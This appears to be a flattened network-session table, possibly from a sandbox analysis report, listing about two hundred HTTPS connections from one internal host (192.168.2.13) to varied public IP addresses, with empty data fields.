                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12408192.168.2.1354076211.22.64.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12409192.168.2.1342854181.84.83.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12410192.168.2.1346744177.127.21.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12411192.168.2.1359174153.61.66.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12412192.168.2.1337554191.219.169.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12413192.168.2.133644235.215.107.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12414192.168.2.1335398134.99.181.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12415192.168.2.133846431.36.231.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12416192.168.2.1343496108.106.160.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12417192.168.2.134563085.143.161.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12418192.168.2.1339950163.208.196.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12419192.168.2.133616849.125.38.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12420192.168.2.1359100210.38.192.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12421192.168.2.1352970209.83.3.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12422192.168.2.135282262.66.38.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12423192.168.2.136011659.136.163.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12424192.168.2.135294272.67.172.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12425192.168.2.1347776116.103.164.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12426192.168.2.1355326124.147.127.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12427192.168.2.134140841.38.43.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12428192.168.2.1346644218.11.210.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12429192.168.2.1337618142.142.27.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12430192.168.2.1353074158.161.243.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12431192.168.2.135093099.81.197.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12432192.168.2.1359772194.41.22.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12433192.168.2.1333554157.208.106.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12434192.168.2.1341574153.35.82.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12435192.168.2.1349320105.88.168.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12436192.168.2.1336742221.109.4.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12437192.168.2.1360824174.129.144.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12438192.168.2.1354612179.124.73.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12439192.168.2.134952824.208.48.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12440192.168.2.134155653.138.52.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12441192.168.2.1341574124.255.59.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12442192.168.2.1352360136.202.53.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12443192.168.2.1336908158.6.174.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12444192.168.2.133391662.79.141.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12445192.168.2.1337114182.27.52.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12446192.168.2.1336002129.3.151.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12447192.168.2.1333686134.226.59.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12448192.168.2.13530482.88.137.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12449192.168.2.1348312157.4.124.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12450192.168.2.1360708149.247.162.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12451192.168.2.1341010119.111.226.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12452192.168.2.134989459.255.73.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12453192.168.2.1336338205.143.72.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12454192.168.2.1341940182.20.98.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12455192.168.2.133878296.214.163.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12456192.168.2.135228432.240.7.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12457192.168.2.1346218194.9.40.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12458192.168.2.135257814.124.108.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12459192.168.2.1339878143.184.228.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12460192.168.2.1356934124.207.230.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12461192.168.2.1356666150.41.208.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12462192.168.2.134740034.22.138.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12463192.168.2.133831425.15.212.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12464192.168.2.1346722144.31.146.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12465192.168.2.1333772177.11.122.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12466192.168.2.13355122.203.27.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12467192.168.2.1342708176.93.216.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12468192.168.2.1346450137.140.199.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12469192.168.2.134701847.238.72.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12470192.168.2.1347508120.153.186.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12471192.168.2.134764095.189.97.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12472192.168.2.1355576223.232.215.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12473192.168.2.1337682202.89.129.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12474192.168.2.1355030158.248.56.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12475192.168.2.1332994166.27.247.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12476192.168.2.1359672130.61.34.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12477192.168.2.13593305.142.211.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12478192.168.2.1336360145.24.93.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12479192.168.2.1336774209.197.220.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12480192.168.2.135365651.92.219.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12481192.168.2.1338804131.120.209.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12482192.168.2.1345264149.236.226.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12483192.168.2.134141294.195.35.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12484192.168.2.13578729.120.193.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12485192.168.2.136074293.232.212.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12486192.168.2.1353086131.198.60.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12487192.168.2.1342316105.29.82.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12488192.168.2.1352990159.148.75.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12489192.168.2.1346762174.200.118.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12490192.168.2.135801298.255.46.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12491192.168.2.135803220.18.224.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12492192.168.2.1337412201.104.111.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12493192.168.2.1334840151.56.147.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12494192.168.2.1351188222.175.188.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12495192.168.2.133946252.39.125.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12496192.168.2.1341174200.145.55.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12497192.168.2.1340542107.136.102.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12498192.168.2.1340166100.28.242.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12499192.168.2.13480661.171.73.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12500192.168.2.1358550144.157.129.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12501192.168.2.135789446.137.79.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12502192.168.2.1333526213.185.232.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12503192.168.2.1338772154.38.201.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12504192.168.2.13510489.157.170.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12505192.168.2.1344588200.197.172.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12506192.168.2.1351152184.246.88.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12507192.168.2.1358168159.102.181.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12508192.168.2.1345914218.166.7.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12509192.168.2.133366479.56.146.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12510192.168.2.134934850.59.95.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12511192.168.2.1335928102.151.88.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12512192.168.2.1348970136.177.201.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12513192.168.2.135176841.134.67.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12514192.168.2.134025687.29.171.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12515192.168.2.1348006183.162.229.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12516192.168.2.135641861.138.83.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12517192.168.2.1333200128.193.194.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12518192.168.2.135696843.107.105.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12519192.168.2.1354102141.172.178.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12520192.168.2.1346260122.15.100.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12521192.168.2.1360016112.154.196.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12522192.168.2.134313499.236.224.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12523192.168.2.1351824145.188.180.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12524192.168.2.134705468.221.195.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12525192.168.2.1360196208.56.225.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12526192.168.2.1354330129.11.176.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12527192.168.2.13602382.202.120.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12528192.168.2.134109098.156.224.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12529192.168.2.1349926182.58.50.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12530192.168.2.1338748136.9.171.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12531192.168.2.1338756155.13.231.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12532192.168.2.133715844.208.88.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12533192.168.2.134945688.214.15.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12534192.168.2.133543077.143.209.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12535192.168.2.133546239.254.83.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12536192.168.2.1360292111.252.22.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12537192.168.2.134523418.118.112.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12538192.168.2.133414664.14.165.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12539192.168.2.134958031.159.190.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12540192.168.2.134169272.159.130.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12541192.168.2.1356134136.226.57.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12542192.168.2.134491014.209.191.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12543192.168.2.1335080169.9.19.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12544192.168.2.1347028100.167.139.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12545192.168.2.1335948145.123.154.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12546192.168.2.1340800204.249.205.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12547192.168.2.135679436.130.226.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12548192.168.2.1335696133.234.173.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12549192.168.2.1339592200.144.37.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12550192.168.2.134305870.175.32.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12551192.168.2.133955481.226.164.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12552192.168.2.1334944190.234.164.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12553192.168.2.135553831.196.24.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12554192.168.2.1346460149.52.5.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12555192.168.2.134893277.219.24.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12556192.168.2.1336282115.118.246.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12557192.168.2.1354222194.251.39.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12558192.168.2.136085245.231.120.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12559192.168.2.1348106107.87.112.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12560192.168.2.1342196205.38.126.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12561192.168.2.135860483.32.178.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12562192.168.2.1360594173.135.221.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12563192.168.2.1336350201.92.139.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12564192.168.2.135672498.141.86.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12565192.168.2.1340964159.155.134.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12566192.168.2.1349256172.52.173.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12567192.168.2.134826425.156.70.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12568192.168.2.1334028157.69.20.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12569192.168.2.1344126131.253.220.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12570192.168.2.1337162155.230.2.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12571192.168.2.1340498217.59.123.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12572192.168.2.1334814114.246.170.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12573192.168.2.1350144142.61.47.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12574192.168.2.1343844175.29.216.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12575192.168.2.1346956200.76.179.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12576192.168.2.1336456147.194.252.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12577192.168.2.1353804118.118.23.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12578192.168.2.1345554110.201.162.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12579192.168.2.135146845.185.16.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12580192.168.2.134422094.23.119.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12581192.168.2.1349696131.164.232.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12582192.168.2.1360634196.153.239.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12583192.168.2.133442240.82.173.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12584192.168.2.136047835.62.97.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12585192.168.2.134450247.185.78.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12586192.168.2.1360652102.107.195.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12587192.168.2.1348512148.210.74.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12588192.168.2.134755038.9.30.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12589192.168.2.134950851.241.117.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12590192.168.2.1350402193.108.236.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12591192.168.2.134916678.169.19.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12592192.168.2.134866660.229.94.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12593192.168.2.1353354219.96.194.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12594192.168.2.135603218.83.78.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12595192.168.2.1359074179.127.214.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12596192.168.2.1352044137.224.104.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12597192.168.2.136065838.183.215.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12598192.168.2.1336896185.14.203.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12599192.168.2.1357088178.118.1.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12600192.168.2.134561035.217.63.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12601192.168.2.1350364207.233.174.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12602192.168.2.1342494109.251.73.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12603192.168.2.1336870197.210.189.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12604192.168.2.1351672202.173.204.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12605192.168.2.135977838.208.8.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12606192.168.2.135144863.103.204.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12607192.168.2.1334692196.253.160.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12608192.168.2.1337846146.132.255.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12609192.168.2.134696883.41.115.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12610192.168.2.1342370130.230.241.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12611192.168.2.1359962122.189.118.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12612192.168.2.1348332174.135.167.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12613192.168.2.134367696.175.79.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12614192.168.2.1341680162.53.238.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12615192.168.2.1354206114.123.19.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12616192.168.2.13506629.172.67.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12617192.168.2.1346040132.49.179.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12618192.168.2.1345760175.101.59.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12619192.168.2.1356196172.209.133.95443
                                                  TimestampBytes transferredDirectionData


